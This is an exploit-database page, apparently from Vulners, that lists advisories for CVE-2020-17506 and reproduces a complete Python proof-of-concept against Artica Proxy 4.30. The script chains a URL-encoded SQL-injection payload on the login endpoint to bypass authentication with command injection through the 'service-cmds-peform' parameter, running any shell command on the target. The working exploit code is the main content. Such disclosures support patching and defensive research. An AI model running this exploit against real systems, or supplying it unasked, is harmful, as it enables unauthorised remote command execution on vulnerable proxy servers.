| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| Artica Proxy 4.3.0 - Authentication Bypass Exploit | 13 Aug 202000:00 | – | zdt | |
| Artica Proxy 4.30.000000 Authentication Bypass / Command Injection Exploit | 22 Sep 202000:00 | – | zdt | |
| CVE-2020-17506 | 21 Sep 202020:38 | – | circl | |
| ArticaTech Artica Web Proxy SQL Injection Vulnerability | 20 Aug 202000:00 | – | cnvd | |
| SQL Injection Over HTTP Traffic (CVE-2020-11530; CVE-2020-17463; CVE-2020-17506; CVE-2020-25990; CVE-2020-27481; CVE-2020-5766; CVE-2020-8655; CVE-2020-8656; CVE-2020-9465) | 18 Nov 202000:00 | – | checkpoint_advisories | |
| CVE-2020-17506 | 12 Aug 202016:33 | – | cve | |
| CVE-2020-17506 | 12 Aug 202016:33 | – | cvelist | |
| Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection | 22 Sep 202017:41 | – | metasploit | |
| Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection | 1 Jun 202605:38 | – | nuclei | |
| CVE-2020-17506 | 12 Aug 202017:15 | – | nvd |
# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-08-13
# Exploit Author: Dan Duffy
# Vendor Homepage: http://articatech.net/
# Software Link: http://articatech.net/download2x.php?IsoOnly=yes
# Version: 4.30.00000000 (REQUIRED)
# Tested on: Debian
# CVE : CVE-2020-17506
import requests
import argparse
from bs4 import BeautifulSoup
def bypass_auth(session, args):
login_endpoint = "/fw.login.php?apikey="
payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
print("[+] Bypassing authentication...")
session.get(args.host + login_endpoint + payload, verify=False)
return session
def run_command(session, args):
cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command)
print("[+] Running command: {}".format(args.command))
response = session.post(args.host + cmd_endpoint, verify=False)
soup = BeautifulSoup(response.text, "html.parser")
print(soup.find_all("code")[1].get_text())
def main():
parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")
parser.add_argument(
"--host", help="The host to target. Format example: https://host:port",
)
parser.add_argument("--command", help="The command to run")
args = parser.parse_args()
if not args.host or not args.command:
parser.print_help()
exit(0)
session = requests.Session()
session = bypass_auth(session, args)
run_command(session, args)
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation